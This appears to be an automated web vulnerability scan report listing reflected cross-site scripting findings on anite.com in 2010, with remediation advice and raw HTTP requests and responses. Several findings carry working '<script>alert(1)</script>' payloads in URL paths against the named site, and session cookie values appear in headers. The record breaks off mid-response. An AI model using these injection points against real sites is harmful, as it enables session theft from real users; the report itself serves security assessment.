Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://anite.com/ [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9454"><a>9804b21275a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?f9454"><a>9804b21275a=1 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 15:07:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Set-Cookie: 87835e346e677cb58ad6bcdf7d06efda=rht8a0rd42qbnjjgjpto2o1se1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:07:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34813

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/?f9454"><a>9804b21275a=1#up">
...[SNIP]...

1.2. http://anite.com/.wireless-events.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/.wireless-events.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 766c6"><script>alert(1)</script>aba63571d4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /766c6"><script>alert(1)</script>aba63571d4a HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:11:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:11:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/766c6"><script>alert(1)</script>aba63571d4a#up">
...[SNIP]...

1.3. http://anite.com/.wireless-events.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/.wireless-events.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f773e"><a>89690cae77d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /.wireless-events.html?f773e"><a>89690cae77d=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:10:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:10:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/.wireless-events.html?f773e"><a>89690cae77d=1#up">
...[SNIP]...

1.4. http://anite.com/about-anite-board-of-directors-2.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/about-anite-board-of-directors-2.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c19f"><a>b6c2bd1e912 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about-anite-board-of-directors-2.html?Itemid=4609c19f"><a>b6c2bd1e912 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:16:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/about-anite-board-of-directors-2.html?Itemid=4609c19f"><a>b6c2bd1e912#up">
...[SNIP]...

1.5. http://anite.com/about-anite-board-of-directors-2.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/about-anite-board-of-directors-2.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5ad7"><script>alert(1)</script>e9be058acff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f5ad7"><script>alert(1)</script>e9be058acff HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:16:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/f5ad7"><script>alert(1)</script>e9be058acff#up">
...[SNIP]...

1.6. http://anite.com/about-anite-board-of-directors-2.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/about-anite-board-of-directors-2.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90fbc"><a>33145bd18f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /about-anite-board-of-directors-2.html?90fbc"><a>33145bd18f9=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:16:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/about-anite-board-of-directors-2.html?90fbc"><a>33145bd18f9=1#up">
...[SNIP]...

1.7. http://anite.com/anite-achieve-tier-1-pci-dss-certification.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-achieve-tier-1-pci-dss-certification.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53459"><a>f623cb2d40d was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-achieve-tier-1-pci-dss-certification.html?Itemid=26453459"><a>f623cb2d40d&nomore=true HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:20:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:20:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-achieve-tier-1-pci-dss-certification.html?Itemid=26453459"><a>f623cb2d40d&nomore=true#up">
...[SNIP]...

1.8. http://anite.com/anite-achieve-tier-1-pci-dss-certification.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/anite-achieve-tier-1-pci-dss-certification.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad5b4"><script>alert(1)</script>0ce67c8104 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad5b4"><script>alert(1)</script>0ce67c8104 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:20:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:20:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/ad5b4"><script>alert(1)</script>0ce67c8104#up">
...[SNIP]...

1.9. http://anite.com/anite-achieve-tier-1-pci-dss-certification.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-achieve-tier-1-pci-dss-certification.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a922d"><a>cfd5759b458 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-achieve-tier-1-pci-dss-certification.html?a922d"><a>cfd5759b458=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:19:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:19:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-achieve-tier-1-pci-dss-certification.html?a922d"><a>cfd5759b458=1#up">
...[SNIP]...

1.10. http://anite.com/anite-and-4m-wireless-showcase-advanced-lte-solutions.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-and-4m-wireless-showcase-advanced-lte-solutions.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecc6b"><a>fd2c5e5e8ab was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-and-4m-wireless-showcase-advanced-lte-solutions.html?Itemid=228ecc6b"><a>fd2c5e5e8ab&nomore=true HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:18:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:18:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-and-4m-wireless-showcase-advanced-lte-solutions.html?Itemid=228ecc6b"><a>fd2c5e5e8ab&nomore=true#up">
...[SNIP]...

1.11. http://anite.com/anite-and-4m-wireless-showcase-advanced-lte-solutions.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/anite-and-4m-wireless-showcase-advanced-lte-solutions.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d0a7"><script>alert(1)</script>adc6195dc19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /9d0a7"><script>alert(1)</script>adc6195dc19 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:18:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:18:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/9d0a7"><script>alert(1)</script>adc6195dc19#up">
...[SNIP]...

1.12. http://anite.com/anite-and-4m-wireless-showcase-advanced-lte-solutions.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-and-4m-wireless-showcase-advanced-lte-solutions.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36af4"><a>6174d44b3b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-and-4m-wireless-showcase-advanced-lte-solutions.html?36af4"><a>6174d44b3b3=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:18:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:18:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-and-4m-wireless-showcase-advanced-lte-solutions.html?36af4"><a>6174d44b3b3=1#up">
...[SNIP]...

1.13. http://anite.com/anite-and-huawei-accelerate-availability-of-td-lte.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/anite-and-huawei-accelerate-availability-of-td-lte.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ab41"><a>2b4d4820a9 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /anite-and-huawei-accelerate-availability-of-td-lte.html?Itemid=2289ab41"><a>2b4d4820a9&nomore=true HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:17:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:17:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/anite-and-huawei-accelerate-availability-of-td-lte.html?Itemid=2289ab41"><a>2b4d4820a9&nomore=true#up">
...[SNIP]...

1.14. http://anite.com/anite-and-huawei-accelerate-availability-of-td-lte.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/anite-and-huawei-accelerate-availability-of-td-lte.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 428ee"><script>alert(1)</script>c033c7315fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /428ee"><script>alert(1)</script>c033c7315fd HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:17:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:17:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
